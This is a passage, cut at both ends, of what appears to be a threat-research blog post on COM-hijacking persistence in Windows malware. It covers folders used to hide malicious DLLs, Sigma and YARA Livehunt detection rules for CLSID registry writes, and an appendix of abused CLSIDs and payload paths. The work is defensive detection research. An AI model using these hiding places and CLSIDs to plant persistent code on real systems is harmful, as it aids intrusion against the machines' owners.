style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">\mymacro</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">\MacroCommerce</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">\Plugin</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">\Microsoft</span>
</p>
</li>
</ul>
<div class="interval_12">In addition to these, we also found the following folders being frequently used to hide malicious DLLs:
</div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="color: #188038; font-family: "Roboto Mono", monospace; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">The <mark class="my-yara-code"><mark class="red">C:\Windows\SysWow64</mark></mark> is a folder found in 64-bit versions of Windows, containing legitimate 32-bit system files and
libraries, and is oftenly used to conceal malicious DLLs. Its prevalence makes it an attractive
hiding place, complicating detection efforts. However, permissions are required to create files in
it.</span></p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">The
</span><span
style="color: #188038; font-family: "Roboto Mono", monospace; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"><mark class="my-yara-code"><mark class="red">C:\Program Files (x86)</mark></mark>
folder is another legitimate directory used to store malicious COM hijacking payloads. Similar to
\AppData\Roaming, in this case we have observed that the malicious DLLs are stored under specific
subfolders, such as “\Google”, “\Mozilla Firefox”, “\Microsoft”, “\Common Files” or “\Internet
Download Manager”.</span></p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="color: #188038; font-family: "Roboto Mono", monospace; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;"><mark class="my-yara-code"><mark class="red">C:\Users\<user>\AppData\Local</mark></mark>
is another folder used for storing these payloads, including the “\Temp”, “\Microsoft” and “\Google”
subfolders.</span></p>
</li>
</ul>
<h1 style="text-align: left;">Detection
</h1>
<div class="interval_12">In order to detect unusual modifications to registry COM objects, there are a couple of crowdsourced Sigma rules to identify this behavior.
</div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a
href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml"
style="text-decoration-line: none;"><span
style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; text-wrap: wrap; vertical-align: baseline;">Potential
Persistence Via COM Hijacking From Suspicious Locations</span></a><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">
(high risk level). Detects suspicious when creating a registry key using COM objects.</span></p>
</li>
</ul><br />
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a
href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml"
style="text-decoration-line: none;"><span
style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; text-wrap: wrap; vertical-align: baseline;">Potential
Persistence Via COM Search Order Hijacking</span></a><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">
(medium risk level). Similar to the previous rule, it also filters out paths associated with
legitimate behaviors.</span></p>
</li>
</ul>
<div class="interval_12">These rules will detect uncommon registry modifications related to COM objects. You can use the following queries to retrieve samples triggered by the previous rules, respectively: <a href="https://www.virustotal.com/gui/search/sigma_rule%253Ac64a541b46d176ef960f347f5e86ee15927eb668f86a5f9f6260bbc94b1d2f3a" target="_blank">VTI query for sigma1</a> and <a href="https://www.virustotal.com/gui/search/sigma_rule%253A7f5d257abc981b5eddb52d4a9a02fb66201226935cf3d39177c8a81c3a3e8dd4" target="_blank">VTI query for sigma2</a>.
</div>
<div class="interval_12">You can also identify this behavior using Livehunt rules that target the creation of registry keys utilized for this purpose, for instance with the <mark class="my-yara-code"><mark class="red">vt.behaviour.registry_keys_set</mark></mark> modifier.
</div>
<pre>import "vt"
rule CLSID_COM_Hijacking: {
meta:
target_entity = "file"
hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
author = "@Joseliyo_Jstnk"
mitre_technique = "T1546.015"
mitre_tactic = "TA0003"
condition:
vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and
for any vt_behaviour_registry_keys_set in vt.behaviour.registry_keys_set: (
vt_behaviour_registry_keys_set.key matches /\\CLSID\\{[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\}\\InProcServer32\\\(Default\)/
)
}</pre>
<div class="interval_12">The rule above might generate some noise, so we suggest considering polishing it by excluding certain common families like Berbew, which as mentioned, heavily relies on this technique:
</div>
<pre>and not
(
for any engine, signature in vt.metadata.signatures : (
signature icontains "berbew"
)
)</pre>
<div class="interval_12">You can also use the paths listed in Appendix to identify suspicious samples using them.
</div>
<div class="interval_12">A final idea is including interesting existing Sigma rules into our Livehunt. Given that these rules already cover the targeted registry keys, we don’t need to use <mark class="my-yara-code"><mark class="red">vt.behaviour.registry_keys_set</mark></mark> in our condition.
</div>
<pre>import "vt"
rule CLSID_COM_Hijacking: {
meta:
target_entity = "file"
hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
author = "@Joseliyo_Jstnk"
sigma_authors = "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien"
mitre_technique = "T1546.015"
mitre_tactic = "TA0003"
condition:
vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and
for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (
vt_behaviour_sigma_analysis_results.rule_id == "7f5d257abc981b5eddb52d4a9a02fb66201226935cf3d39177c8a81c3a3e8dd4"
)
}</pre>
<h1 style="text-align: left;">Wrapping up
</h1>
<div class="interval_12">The T1546.015 - Event Triggered Execution: Component Object Model Hijacking is just one of several techniques employed for persistence. Leveraging COM objects for this task is frequently straightforward for threat actors. The analysis of how malware abuses this technique helps us get a better understanding in how to identify different families and develop protection methods. Although the technique is not the most popular for persistence (that would be T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), it is widely abused by many malware families.
</div>
<div class="interval_12">Identifying some of the most abused CLSIDs can help us generate detection rules that identify possible malware abuses in our infrastructure. It can also serve as a good guide for prevalence in order to detect any anomalies for new suspicious activity.
</div>
<div class="interval_12">The use of VirusTotal sandbox reports provides a very powerful tool to translate TTPs into actionable queries and monitoring. In this example we used it to better understand how attackers use COM objects, but could be used for any techniques employed by different threat actors.
</div>
<div class="interval_12">We hope you join our fan club of Sigma and VirusTotal, and as always <a href="https://www.virustotal.com/gui/contact-us" target="_blank">we are happy to hear your feedback</a>.
</div>
<h1 style="text-align: left;">APPENDIX
</h1>
<h2 style="text-align: left;">Abused CLSIDs
</h2>
<div class="interval_12">Next, you'll find a list of the main CLSIDs described in the blog, along with a chart to show which ones were used the most.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/Dn_TKOQbzGbN6WR3mwhz34h0pZAPNXhCVrEfwKkmfkk5MeYZ2LoRp3a0IwUgoEBsOau9ewHpjxuXMAoL9BsrY82z3iXijDpi65ZM3tvn1Cvo1OIfIp2xeurNAjRH3ugmBaraveflDx2MB-3kCIXMonrU94mM5mEHZmD7rttkjubPlLV4KgWnTn65DSChYyI" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> <table style="border-collapse: collapse; border: none; " >
<colgroup>
<col width="443">
</col>
</colgroup>
<tbody>
<tr style="height: 5pt;" class="table-fields">
<td
style="background-color: #394eff; border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">CLSID
- COM Objects</span></p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">79FAA099-1BAE-816E-D711-115290CEE717</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">EBEB87A6-E151-4054-AB45-A6E094C5334B</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">241D7F03-9232-4024-8373-149860BE27C0</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C07DB6A3-34FC-4084-BE2E-76BB9203B049</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">79ECA078-17FF-726B-E811-213280E5C831</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">22C6C651-F6EA-46BE-BC83-54E83314C67F</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">F4CBF20B-F634-4095-B64A-2EBCDD9E560E</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">57477331-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C73F6F30-97A0-4AD1-A08F-540D4E9BC7B9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">89565275-A714-4a43-912E-978B935EDCCC</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">26037A0E-7CBD-4FFF-9C63-56F2D0770214</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">16426152-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">33414471-126E-4FC8-B430-1C6143484AA9</span><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><span
class="Apple-tab-span" style="text-wrap: nowrap;"> </span></span></p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">23716116-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">79FEACFF-FFCE-815E-A900-316290B5B738</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">74A94F46-4FC5-4426-857B-FCE9D9286279</span>
</p>
</td>
</tr>
</tbody>
</table> </div>
<h2 style="text-align: left;">Common paths
</h2>
<div class="interval_12">Below you will find a list with some of the most common paths used during the creation of the COM objects for persistence. The table contains the 'parent' paths as well, while the chart includes only the 'subpaths'.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/Apy2CDZzU_kZqC5EwbVrWhJSZ8VcmyvGVwrxTn5PXiOdFez2r6Tm1JOJHzSt-7J6nGWg8qYbR9qRF5yFN2Ua6M8Id1dLg9-weNnfmrNFafRxJayw0oy7SNZG9y1gxSvjYsg3CuMMRyUrf5ecDe1YSsC-GwavMoumQa2_ruWN6NI9dKC91VHmNAiz0_d-keY" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> <table style="border-collapse: collapse; border: none;">
<colgroup>
<col width="444">
</col>
</colgroup>
<tbody>
<tr style="height: 15.75pt;" class="table-fields">
<td
style="background-color: #394eff; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Common
paths used during COM object persistence</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Roaming</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Roaming\qmacro</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Roaming\mymacro</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Roaming\MacroCommerce</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Roaming\Plugin</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Roaming\Microsoft</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
